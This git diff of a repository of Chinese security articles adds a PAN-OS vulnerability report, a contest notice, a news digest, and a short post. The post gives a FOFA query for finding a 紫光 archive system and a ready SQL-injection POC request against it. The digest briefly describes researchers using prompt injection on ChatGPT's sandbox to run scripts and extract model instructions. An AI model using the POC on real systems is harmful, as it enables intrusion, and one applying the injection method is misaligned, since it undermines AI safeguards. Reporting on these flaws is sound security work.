第二个漏洞CVE-2024-9474则允许恶意的PAN-OS管理员提升权限,以root身份执行命令。该漏洞存在于AuditLog.php文件中,由于用户输入未经proper过滤,导致可能遭受命令注入攻击。
|
||||||
|
|
||||||
|
研究人员在负责写入审计日志的函数中发现了一处关键性更改。Sonny演示了如何利用这个漏洞提升权限,他表示:"用户竟然可以传入包含shell元字符的用户名到AuditLog.write()函数中,这些字符随后会被传递给pexecute()函数。"
|
||||||
|
|
||||||
|
Sonny敦促管理员们迅速采取行动,并指出这个漏洞利用链的简单性:"这两个漏洞能够出现在生产环境的设备中着实令人吃惊,更让人惊讶的是它们是通过Palo Alto设备底层那堆杂乱的shell脚本调用实现的。"
|
||||||
|
|
||||||
|
为了给管理员留出打补丁的时间,watchTowr暂时没有公布完整的概念验证利用代码,但他们提供了一个Nuclei模板用于检测系统是否存在漏洞。
|
||||||
|
|
||||||
|
另一方面,安全研究员Valentin Lobstein已经开发并发布了CVE-2024-0012和CVE-2024-9474的PoC利用代码,使得漏洞利用变得极其简单。基于watchTowr的分析,Lobstein开发的Go语言工具实现了攻击过程的自动化,用户只需输入目标URL即可。这个现成的利用工具增加了遭受攻击的风险,也凸显了及时修补易受攻击系统的紧迫性。
|
||||||
|
|
||||||
|
Palo Alto Networks已在PAN-OS 10.2.12-h2版本中修复了这些漏洞。
|
||||||
|
>
|
||||||
|
> watchTowr详细分析:https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
|
||||||
|
|
||||||
|
>
|
||||||
|
> nuclei检测模板:https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012
|
||||||
|
|
||||||
|
>
|
||||||
|
> Exp利用代码:https://github.com/Chocapikk/CVE-2024-9474
|
||||||
|
|
||||||
|
>
|
||||||
|
> 请合法合规使用,任何乱用与本公众号无关,本公众号出于研究学习目的分享。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
132
doc/第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示.md
Normal file
132
doc/第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示.md
Normal file
@ -0,0 +1,132 @@
|
|||||||
|
# 第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示
|
||||||
|
原创 安钥 方桥安全漏洞防治中心 2024-11-20 10:00
|
||||||
|
|
||||||
|

|
||||||
|
# 锤炼安全金钥,共筑安全防线
|
||||||
|
# 安钥®「漏洞处置标准作业程序(SOP)」征文启示
|
||||||
|
# 第13期
|
||||||
|
|
||||||
|
11月20日 - 11月30日
|
||||||
|
# 【 活 动 主 题 】
|
||||||
|
|
||||||
|
数字时代浪潮奔涌而来,网络安全已成为国家、企业和个人必须重视的工作。
|
||||||
|
|
||||||
|
每个漏洞都可能成为网络攻击的突破口。
|
||||||
|
|
||||||
|
修补漏洞的过程经常充满挑战,如同一把把锈蚀难开的锁。
|
||||||
|
|
||||||
|
漏洞处置标准作业程序(SOP)就是我们全力锤炼的金钥匙,旨在高效处置漏洞,筑牢安全防线。
|
||||||
|
|
||||||
|
谨以此文,诚邀您参加
|
||||||
|
**“安钥®「漏洞处置标准作业程序(****SOP****)」征文”**
|
||||||
|
活动,分享您的经验和智慧,帮助国家、企业、社区、家庭、个人更有效地防范网络安全风险。
|
||||||
|
# 【 目 标 作 者 】
|
||||||
|
- 网络安全专业人员
|
||||||
|
|
||||||
|
- 软件开发人员
|
||||||
|
|
||||||
|
- IT运维人员
|
||||||
|
|
||||||
|
- 能分享安全漏洞处置经验的任何专业人士
|
||||||
|
|
||||||
|
# 【 活 动 特 点 】
|
||||||
|
- **实战导向:**
|
||||||
|
定期收集漏洞情报,如必修漏洞、关键漏洞、严重影响业务的漏洞、Day 1 漏洞等,针对这些漏洞征集「漏洞处置SOP」,总结和分享真实工作场景中收获的经验和教训。
|
||||||
|
|
||||||
|
- **专业指导:**
|
||||||
|
提供两篇已验证的的SOP样例,SOP模板,SOP编写方法与过程。
|
||||||
|
[三步写好「漏洞处置SOP」](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484146&idx=1&sn=d5a39e4fad74df928be97dd1a952d040&chksm=c3593397f42eba81b49be3fd473da1c85c88ea8507ca69f7852cd8801064e27594684dde7f76&scene=21#wechat_redirect)
|
||||||
|
供你参考,助你快速上手。
|
||||||
|
(文末添加运营助手获取样例)
|
||||||
|
|
||||||
|
- **现金奖励****:**
|
||||||
|
评审合格的SOP将获得
|
||||||
|
**300元~500元**
|
||||||
|
稿酬。后续还将从合格SOP中评选出优秀作品,奖金
|
||||||
|
**最高可达1,000元**
|
||||||
|
。
|
||||||
|
|
||||||
|
- **长期签约:**
|
||||||
|
每期的前3名有机会成为签约作者,长期合作共赢。
|
||||||
|
|
||||||
|
- **公开发布:**
|
||||||
|
所有入选作品在公众号发布,并推荐到安全专业新媒体平台展示,署名作者持续积累专业声誉。
|
||||||
|
|
||||||
|
# 【 征 文 形 式 】
|
||||||
|
|
||||||
|
本身我们提供 10 个安全漏洞处置的标准作业程序(SOP)框架稿,在此基础上你需要依照
|
||||||
|
**“修补方案”**
|
||||||
|
实施并记录,具体方式包括:
|
||||||
|
**升级、打补丁、修改配置**
|
||||||
|
等。
|
||||||
|
|
||||||
|
你可从这 10 份框架稿中任选一份或者多份,自行搭建环境实施修复方案,并详细记录修补漏洞的过程,说明具体的操作步骤和系统输出(需配图),基于修补漏洞的过程编写
|
||||||
|
**“详细漏洞处置步骤”**
|
||||||
|
后,通过邮件提交。
|
||||||
|
|
||||||
|
参考:[编写「漏洞处置SOP」的方法与要点](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484146&idx=1&sn=d5a39e4fad74df928be97dd1a952d040&chksm=c3593397f42eba81b49be3fd473da1c85c88ea8507ca69f7852cd8801064e27594684dde7f76&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
# 【 征 文 要 求 】
|
||||||
|
1. **原创:**
|
||||||
|
投稿作品必须为本人编写,不得抄袭,不得洗稿等。一经发现,取消资格。
|
||||||
|
|
||||||
|
1. **实用:**
|
||||||
|
依据修复方案,详细记录漏洞修复过程,说明详细操作步骤(配图)、验证及后续跟踪等关键环节,确保漏洞处置过程完整、清晰、可操作。
|
||||||
|
|
||||||
|
1. **规范:**
|
||||||
|
行文注意逻辑严谨,文字流畅。合理使用标题、段落、列表等样式组织内容,确保易于阅读。(参考样例:[漏洞修复SOP | 处置ESXi 6.7(VMware ESXi 6u7a)的一系列安全漏洞](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247483946&idx=1&sn=e1a4ea2f8e2e13f3384ee76ec45942f1&chksm=c359334ff42eba5997b93f18249e498a12fd09efacba3f0366297924517748e4678d902299f5&scene=21#wechat_redirect)
|
||||||
|
)
|
||||||
|
|
||||||
|
> 在上述3点基础上,鼓励创新。<
|
||||||
|
1. **创新:**
|
||||||
|
体现在制订/设计漏洞处置方案以达到比常规方案更好的效果。如:花的时间更短,部分自动化,提供shell脚本,采用新技术(新工具)获得更好的效果等。
|
||||||
|
|
||||||
|
# 【 投 稿 方 式 】
|
||||||
|
|
||||||
|

|
||||||
|
1. **添加运营助手:**
|
||||||
|
下方扫码添加运营助手,注明
|
||||||
|
**“SOP”**
|
||||||
|
,获取参赛附件。
|
||||||
|
|
||||||
|
1. **电子投稿:**
|
||||||
|
请将投稿作品以Word或PDF格式提交至邮箱
|
||||||
|
**SOP123#tingqiao_net**
|
||||||
|
,邮件标题请注明
|
||||||
|
**“漏洞处置SOP征文活动+署名+作品标题”**
|
||||||
|
。(注:为减少垃圾邮件,请将"#"替换成"@",将"_"替换为".")
|
||||||
|
|
||||||
|
1. **截止日期:**
|
||||||
|
2024年11月30日(周六)23:59前
|
||||||
|
|
||||||
|
1. **结果公布:**
|
||||||
|
2024年12月7日(周六)
|
||||||
|
|
||||||
|
扫码添加运营助手获取参赛附件
|
||||||
|
▽
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
本征文活动的解释权归上海方桥信息技术有限公司所有。
|
||||||
|
|
||||||
|
|
||||||
|
**往期入选公布**
|
||||||
|
|
||||||
|
|
||||||
|
[入选作品公布|安钥®「漏洞处置标准作业程序(SOP)」征文第一期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484176&idx=1&sn=075c87d06e177c5cfc335bc6dbcf67dd&chksm=c3593275f42ebb63192e174945ba9a5af5b6d8aa45b384f4328accb7638f87122b31ab831173&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
||||||
|
[入选作品公布|安钥®「漏洞处置标准作业程序(SOP)」征文第二期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484220&idx=1&sn=3c76a50ede2f7968337f251cdacd34ce&chksm=c3593259f42ebb4f628b691fe3967f35acbff64cce9bdd5815c335b3d435effe2224ba59cf64&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
||||||
|
[入选作品公布|安钥®「漏洞处置标准作业程序(SOP)」征文第八期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484325&idx=1&sn=de7186ee2bde1a9178df7086cf65b1d9&chksm=c35932c0f42ebbd6e7f6217837931f17af287900a429dbe5f34b293b9f16e42a57d4ea678c14&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
||||||
|
[入选作品公布|安钥®「漏洞处置标准作业程序(SOP)」征文第九期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484336&idx=1&sn=5b5f56173e65a5aed2c40f5ef1290968&chksm=c35932d5f42ebbc342a74cacca178be54d2b6b08d095ad1dd1177b75f0998799fffd011e6ba6&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
||||||
|
欢迎关注公众号
|
||||||
|
|
||||||
|
▽
|
||||||
|
|
||||||
|
|
46
doc/紫光档案管理系统 mergeFile SQL注入漏洞.md
Normal file
46
doc/紫光档案管理系统 mergeFile SQL注入漏洞.md
Normal file
@ -0,0 +1,46 @@
|
|||||||
|
# 紫光档案管理系统 mergeFile SQL注入漏洞
|
||||||
|
原创 CatalyzeSec CatalyzeSec 2024-11-20 11:24
|
||||||
|
|
||||||
|
# FOFA
|
||||||
|
```
|
||||||
|
app="紫光-档案管理系统"
|
||||||
|
```
|
||||||
|
# POC
|
||||||
|
```
|
||||||
|
POST /Archive/ErecordManage/mergeFile HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Accept-Language: zh-CN
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||||
|
Accept-Encoding: gzip, deflate, br
|
||||||
|
Connection: keep-alive
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 31
|
||||||
|
|
||||||
|
userID=admin&fondsid=1&comid=1'
|
||||||
|
```
|
||||||
|
# 漏洞复现
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
# nuclei运行结果
|
||||||
|
|
||||||
|

|
||||||
|
# nuclei-poc已上传到星球
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态,解答交流各类技术问题。
|
||||||
|
涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。**CatalyzeSec**
|
||||||
|
,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。
|
||||||
|
我们是一个快速成长的team,团队的发展方向与每一位星友的学习方向密切相关,加入我们,一起成为更好的自己!
|
||||||
|
PS:随着星球内知识的积累,人员的增加,
|
||||||
|
星球价格也会随之增加,前一百位加入我们的师傅可享受99元朋友价!
|
||||||
|
|
||||||
|
**微信群专属推送机器人**
|
||||||
|
|
||||||
|

|
||||||
|
#
|
||||||
|
|
@ -0,0 +1,262 @@
|
|||||||
|
# 美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览
|
||||||
|
安全牛 2024-11-20 04:16
|
||||||
|
|
||||||
|
点击蓝字·关注我们
|
||||||
|
/
|
||||||
|
aqniu
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**新闻速览**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
•2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕
|
||||||
|
|
||||||
|
•《工业和信息化领域数据安全合规指引》联合发布
|
||||||
|
|
||||||
|
•美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露
|
||||||
|
|
||||||
|
•ClickFix攻击手法全球蔓延,虚假错误提示暗藏玄机
|
||||||
|
|
||||||
|
•黑客利用Facebook平台投放假冒Bitwarden广告传播恶意程序
|
||||||
|
|
||||||
|
•ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复
|
||||||
|
|
||||||
|
•WordPress核心安全插件曝认证漏洞,或威胁超400万网站安全性
|
||||||
|
|
||||||
|
•Microsoft 365管理门户或遭滥用,可帮助勒索诈骗邮件逃避安全检测
|
||||||
|
|
||||||
|
•升级网络安全培训体系,CISA新一代学习管理平台启用
|
||||||
|
|
||||||
|
•强化Gmail隐私保护,Google推出Shielded Email新功能
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**特别关注**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕**
|
||||||
|
|
||||||
|
|
||||||
|
11月19日,由世界互联网大会和浙江省人民政府共同主办的2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕。国家互联网信息办公室副主任王崧、世界互联网大会秘书长任贤良等出席开幕式。浙江省人民政府副省长柯吉欣出席开幕式并致辞。
|
||||||
|
|
||||||
|
|
||||||
|
作为世界互联网大会乌镇峰会的重要活动,“互联网之光”博览会自2014年以来,紧紧围绕“携手构建网络空间命运共同体”的理念主张,走过了风雨追光、创新发展的十年,旨在成为互联网领域引领前沿技术趋势、展示行业最新成果、促进全球产业合作的重要平台。
|
||||||
|
|
||||||
|
|
||||||
|
2024年是“互联网之光”博览会第二个十年的新起点。围绕本届乌镇峰会“拥抱以人为本、智能向善的数字未来——携手构建网络空间命运共同体”主题,博览会以人工智能为展示重点,持续深化全球数字合作,秉持共生共赢的精神,进一步拓展“国际朋友圈”,引领网络空间命运共同体进入新的发展阶段。
|
||||||
|
|
||||||
|
|
||||||
|
本届博览会设置了五大活动板块,包括展览展示、新产品新技术发布、产业人才引智、产业合作对接、“新光”系列推介,通过“线下实景+线上云展”的方式,全面展示全球互联网的最新发展成果和人工智能领域的新技术、产品,吸引了来自53个国家和地区的665家中外企业与机构参展。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://mp.weixin.qq.com/s/KzbP47BWloCAYdTKG_78QA
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**《工业和信息化领域数据安全合规指引》联合发布**
|
||||||
|
|
||||||
|
|
||||||
|
为贯彻落实《数据安全法》《网络数据安全管理条例》《工业和信息化领域数据安全管理办法(试行)》等法律政策要求,引导工业和信息化领域数据处理者规范开展数据处理活动,中国钢铁工业协会、中国有色金属工业协会、中国石油和化学工业联合会、中国建筑材料联合会、中国机械工业联合会、中国汽车工业协会、中国纺织工业联合会、中国轻工业联合会、中国电子信息行业联合会、中国计算机行业协会、中国通信企业协会、中国互联网协会、中国通信标准化协会、中国中小企业国际合作协会、中国通信学会、工业和信息化部商用密码应用产业促进联盟、工业信息安全产业发展联盟等单位组织编制了《工业和信息化领域数据安全合规指引》(简称《合规指引》)。各相关单位、企业在履行数据安全保护义务时可以参考使用,共同维护数据安全、促进行业健康发展。
|
||||||
|
|
||||||
|
|
||||||
|
完整版《合规指引》可访问原文链接获取。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://mp.weixin.qq.com/s/rOhvWgp_UekqTpMll7rYvQ
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**网络攻击**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露**
|
||||||
|
|
||||||
|
|
||||||
|
美国国会图书馆日前披露其信息技术系统遭到疑似外国黑客组织入侵,攻击者获取了国会办公室与图书馆工作人员之间的电子邮件通信内容。据NBC News报道,美国国会图书馆已就这起"网络安全事件"通知了国会相关办公室。受影响的电子邮件通信内容涉及2024年1月至9月期间国会办公室与图书馆工作人员(包括国会研究服务处)之间的往来信息。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
作为美国实际上的国家图书馆,国会图书馆不仅为美国国会两院提供图书馆和研究服务,还通过美国版权局负责管理版权法的实施。在发现安全漏洞后,图书馆方面已第一时间通知执法部门,目前相关调查仍在进行中。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
国会图书馆在通报中表示:"图书馆已经修复了被攻击者利用的安全漏洞,并采取了相应措施防止类似事件再次发生。"同时确认美国众议院和参议院的电子邮件网络系统以及美国版权局的系统均未受到此次事件影响。而对于攻击者的身份以及攻击发生的具体时间点,调查人员仍在进一步核实中。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://securityaffairs.com/171138/data-breach/library-of-congress-email-communications-hacked.html
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**ClickFix攻击手法全球蔓延,虚假错误提示暗藏玄机**
|
||||||
|
|
||||||
|
|
||||||
|
近期,网络安全公司Proofpoint发布分析报告指出,黑客组织正在加大对"ClickFix"社会工程学攻击的利用。这种战术在恶意软件部署方面显示出极高的效率。自2024年3月以来,多个威胁组织已发起了数次利用该战术的攻击活动。
|
||||||
|
|
||||||
|
|
||||||
|
ClickFix是一种独特的社会工程学技术,攻击者通过对话框显示虚假错误信息,诱导用户在自己的计算机上复制、粘贴并运行恶意代码。这种方式由用户自己执行感染操作,能够有效绕过安全保护机制。攻击者利用了用户倾向于自行解决问题而不是通知IT团队的心理,通过伪装成Microsoft Word和Google Chrome等常用企业软件发起攻击。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
技术分析显示,对话框可能来自被入侵的网站、文档、HTML附件或恶意URL。用户按照所谓的"修复"指令操作时,实际上会触发两种情况:要么自动将恶意脚本复制到PowerShell终端或Windows对话框中执行,要么手动打开PowerShell并粘贴提供的命令。通过这种方式,AsyncRAT、Danabot、DarkGate、Lumma Stealer和NetSupport等多种恶意软件都能成功部署。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
值得注意的是,攻击者近期频繁使用伪造的CAPTCHA验证码主题技术,通过"验证您是人类"的检查进行欺骗。这种活动大多基于一个名为"reCAPTCHA Phish"的开源工具包,该工具包自2024年9月起在GitHub上以"教育目的"提供。在一次影响全球至少300个组织的攻击中,威胁者利用GitHub通知发送恶意软件,通过伪装成GitHub安全警告的方式诱导用户执行PowerShell命令。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://www.infosecurity-magazine.com/news/clickfix-cyber-malware-rise/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**黑客利用Facebook平台投放假冒Bitwarden广告传播恶意程序**
|
||||||
|
|
||||||
|
|
||||||
|
近日,网络安全公司Bitdefender披露了一起针对Facebook商业账户的恶意广告攻击活动。攻击者通过Meta广告平台投放虚假广告,伪装成知名密码管理工具Bitwarden的安全更新,诱导用户安装恶意Chrome浏览器扩展程序。该攻击活动于2024年11月3日被发现,虽然目前已被关停,但安全专家警告类似威胁可能会再次出现。
|
||||||
|
|
||||||
|
|
||||||
|
据研究人员介绍,攻击者精心设计了伪装成Bitwarden官方的Facebook广告,警告用户密码可能已被泄露,并催促用户立即进行所谓的"安全更新"。这些广告巧妙使用了Bitwarden的品牌元素和专业用语,让用户对其真实性深信不疑。
|
||||||
|
|
||||||
|
|
||||||
|
技术分析显示,攻击的核心是background.js脚本,它在安装后立即激活并执行多项恶意操作:通过Google Script URL充当命令控制服务器进行数据窃取;搜索并收集Facebook Cookie,特别是包含用户Facebook ID的c_user cookie;获取用户IP地址和地理位置信息;利用Graph API提取Facebook个人和商业信息。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**漏洞预警**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**ChatGPT沙箱环境存在多个严重安全隐患,仅有20%漏洞被修复**
|
||||||
|
|
||||||
|
|
||||||
|
Mozilla 0Din安全研究团队近日披露了OpenAI ChatGPT沙箱环境中的多个安全漏洞,这些漏洞允许攻击者上传并执行Python脚本,甚至能够获取语言模型的内部配置信息。目前OpenAI仅修复了上述五个漏洞中的一个。
|
||||||
|
|
||||||
|
|
||||||
|
这一发现源于Mozilla 0Din的GenAI漏洞赏金项目经理Marco Figueroa在使用ChatGPT进行Python项目开发时遇到的一个异常错误。随后的深入调查显示,ChatGPT的沙箱环境基于Debian系统搭建,其访问权限远超预期。技术细节显示,攻击者可以通过提示注入(prompt injection)在ChatGPT环境中执行Python脚本,实现文件的列举、修改和迁移。更为严重的是,研究人员还发现可以提取模型的核心指令和知识库,这种访问级别极具危险性,不仅可能导致模型配置信息泄露,还可能被用于传播恶意脚本或未经授权的数据访问。
|
||||||
|
|
||||||
|
|
||||||
|
对于这些发现,OpenAI的回应令人意外。该公司声称沙箱环境的设计本意就是提供一个受控环境,允许用户执行代码而不影响整体系统,并将大多数交互视为预期功能而非安全问题。然而,研究人员认为,当前沙箱环境所提供的访问权限已经超出了合理范围。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://hackread.com/mozilla-0din-chatgpt-sandbox-flaws-python-execution/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**WordPress核心安全插件曝认证漏洞,或威胁超400万网站安全性**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
WordPress热门安全插件Really Simple Security(原Really Simple SSL)被发现存在严重的身份认证绕过漏洞,该漏洞可能使攻击者获得网站的完整管理权限。这一漏洞影响了全球超过400万个WordPress网站。
|
||||||
|
|
||||||
|
|
||||||
|
Wordfence安全研究员István Márton警告说:"这个漏洞可以被编写成脚本,意味着攻击者可以对WordPress网站发起大规模自动化攻击。"技术分析显示,此漏洞存在于9.0.0至9.1.1.1版本中,源于名为"check_login_and_get_user"函数中的用户检查错误处理不当。当启用双因素认证时,未经身份验证的攻击者可以通过简单的请求,以任意用户身份(包括管理员)登录系统。
|
||||||
|
|
||||||
|
|
||||||
|
漏洞于本月6日被负责任地披露给开发团队,并在一周后的9.1.2版本中得到修复。考虑到潜在的滥用风险,插件维护者与WordPress合作,在公开披露之前强制更新了所有运行该插件的网站。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://thehackernews.com/2024/11/urgent-critical-wordpress-plugin.html
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**Microsoft 365管理门户或遭滥用,可帮助勒索诈骗邮件逃避安全检测**
|
||||||
|
|
||||||
|
|
||||||
|
网络安全专家Lawrence Abrams日前披露,近期发现不法分子正在滥用Microsoft 365管理门户的消息中心功能发送勒索欺诈邮件。这些邮件由微软官方邮箱"o365mc@microsoft.com"发出,因此能够绕过垃圾邮件过滤器,直接进入收件箱。
|
||||||
|
|
||||||
|
|
||||||
|
专家表示,这类勒索欺诈邮件是一种诈骗手段,诈骗者声称已经入侵受害者的电脑或移动设备,窃取了其私密照片或视频,并威胁索要500至5000美元的赎金,否则将与受害者的亲友分享这些所谓的隐私照片。虽然这种诈骗手法看似拙劣,但自2018年首次出现以来,每周仍能为诈骗者带来超过5万美元的非法收入。
|
||||||
|
|
||||||
|
|
||||||
|
技术分析显示,攻击者通过Microsoft 365管理门户的"消息中心"功能实施诈骗。该功能原本用于分享微软服务通知和新功能介绍等信息。攻击者利用其中的"分享"功能,在"个人消息"栏中插入勒索内容。虽然该字段正常限制为1000字符,但攻击者通过修改浏览器开发者工具中的textarea标签最大长度限制,成功突破了字符限制。由于Microsoft未在服务器端进行字符长度检查,完整的勒索信息得以随通知一起发送。
|
||||||
|
|
||||||
|
|
||||||
|
微软公司发言人表示:"我们十分重视安全和隐私问题。目前正在调查这些报告,并将采取行动保护用户。"但截至目前,Microsoft尚未在服务器端增加字符限制检查。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://www.bleepingcomputer.com/news/security/microsoft-365-admin-portal-abused-to-send-sextortion-emails/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**产业动态**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**升级网络安全培训体系, CISA新一代学习管理平台启用**
|
||||||
|
|
||||||
|
|
||||||
|
美国网络安全和基础设施安全局(CISA)于近日宣布推出新一代学习管理系统"CISA Learning"。该平台将取代原有的联邦虚拟培训环境(FedVTE),致力于为机构员工和关键利益相关者提供现代化的培训和教育服务。
|
||||||
|
|
||||||
|
|
||||||
|
CISA首席人事官Elizabeth Kolmstetter博士表示:"CISA Learning将提供一个易于导航的现代化学习管理系统,在现有工具和资源的基础上,继续为政府雇员、承包商和美国退伍军人提供免费的网络安全培训。这体现了CISA致力于培养和发展国家网络安全人才队伍的承诺,以更好地保护美国人民每天依赖的关键基础设施。"
|
||||||
|
|
||||||
|
|
||||||
|
作为CISA企业学习环境现代化的关键组成部分,CISA Learning将为联邦、州、地方、部落和领地各级政府的合作伙伴以及退伍军人提供免费培训资源。新平台提供课堂培训、虚拟讲师指导培训和自定进度在线模块等多种可扩展的培训方案,使用户能够灵活地在办公室、家中或野外参与课程学习。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://www.cisa.gov/news-events/news/cisa-launches-new-learning-platform-enhance-training-and-education-us-veterans-and-other
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**强化Gmail隐私保护,Google推出Shielded Email新功能**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Google近日宣布推出突破性新功能"Shielded Email",旨在革新电子邮件隐私保护并对抗垃圾邮件。该创新工具允许Gmail用户创建临时邮箱别名,在注册在线服务或填写表单时有效隐藏主邮箱地址。
|
||||||
|
|
||||||
|
|
||||||
|
据报道,Shielded Email通过生成独特的一次性电子邮件地址来实现功能。这些地址会自动将收到的邮件转发到用户的主Gmail收件箱。用户可能在Autofill(自动填充)设置菜单中找到创建Shielded Email地址的选项,便于在各类应用和网站中使用。这意味着用户可以在不暴露真实邮箱地址的情况下与网站和服务进行交互,显著降低收到垃圾邮件和不必要营销信息的风险。
|
||||||
|
|
||||||
|
|
||||||
|
该功能的一大亮点是用户可以通过停用这些相关的隐私地址,轻松切断来自任何问题源的通信。这种程度的控制为用户提供了前所未有的收件箱管理能力。隐私倡导者认为,随着在线隐私问题日益突出,Shielded Email等工具变得越发重要。通过赋予用户更多个人信息控制权,不仅改善了电子邮件使用体验,还为科技行业的数字隐私保护设立了新标准。这可能标志着打击垃圾邮件和未经授权数据收集战的转折点。
|
||||||
|
|
||||||
|
|
||||||
|
原文链接:
|
||||||
|
|
||||||
|
https://cybersecuritynews.com/google-announces-shielded-email-feature/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
合作电话:18311333376
|
||||||
|
|
||||||
|
合作微信:aqniu001
|
||||||
|
|
||||||
|
投稿邮箱:editor@aqniu.com
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
@ -1,78 +1,45 @@
|
|||||||
# 美国饮用水系统存在300多个漏洞,影响1.1亿人
|
# 美国饮用水系统存在300多个漏洞,影响1.1亿人
|
||||||
FreeBuf 商密君 2024-11-19 14:31
|
黑白之道 2024-11-20 06:58
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
> 美国环境保护署(EPA)标记了300多个饮用水系统的安全漏洞,这些系统为大约1.1亿人提供服务。
|
> 美国环境保护署(EPA)标记了300多个饮用水系统的安全漏洞,这些系统为大约1.1亿人提供服务。
|
||||||
|
|
||||||
|
|
||||||
|
近日,美国环境保护署(EPA)监察长办公室(OIG)发布了一份研究报告,在对美国1062个饮用水系统进行了安全性缺陷评估活动之后,结果显示,超过300个饮用水系统存在系统漏洞,存在可能导致功能丧失、无法服务和用户信息泄露的风险。不安全的饮用水系统为1.1亿美国人提供服务。
|
||||||
近日,美国环境保护署(EPA)监察长办公室(OIG)发布了一份研究报告,在对美国1062个饮用水系统进行了安全性缺陷评估活动之后,结果显示,超过300个饮用水系统存在系统漏洞,存在可能导致功能丧失、无法服务和用户信息泄露的风险。不安全的饮用水系统为1.1亿美国人提供服务。
|
|
||||||
|
|
